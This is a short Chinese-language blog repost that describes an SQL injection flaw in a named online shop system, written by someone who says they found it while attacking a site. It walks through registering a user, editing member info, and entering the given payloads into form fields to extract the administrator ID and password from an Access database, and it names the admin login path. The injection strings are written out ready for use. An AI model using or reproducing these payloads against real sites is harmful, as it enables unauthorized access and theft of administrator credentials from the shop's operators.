官网:http://www.wqeshop.com/ 也不晓得用的人多不多..上次搞站的时候..不小心盲注出来的. 具体看过程... 注册个用户, 进入会员中心,点击“会员信息”页面进行信息修改 在表单的任何一项中都可以进入暴数据操作 暴管理员ID:l', Name = Cstr(DLookUp('memberid', 'admin')) + ' 暴管理员密码:l', Name = Cstr(DLookUp('Password', 'member', 'memberid=1')) 红色的"1"字代表上一步暴出来的管理员ID 后台地址:web+/admin/ 上面的方法得针对ACCESS的...当然如果是SQL的....啥都不用说了...大家都懂的.
转载于:https://blog.51cto.com/hellxman/760713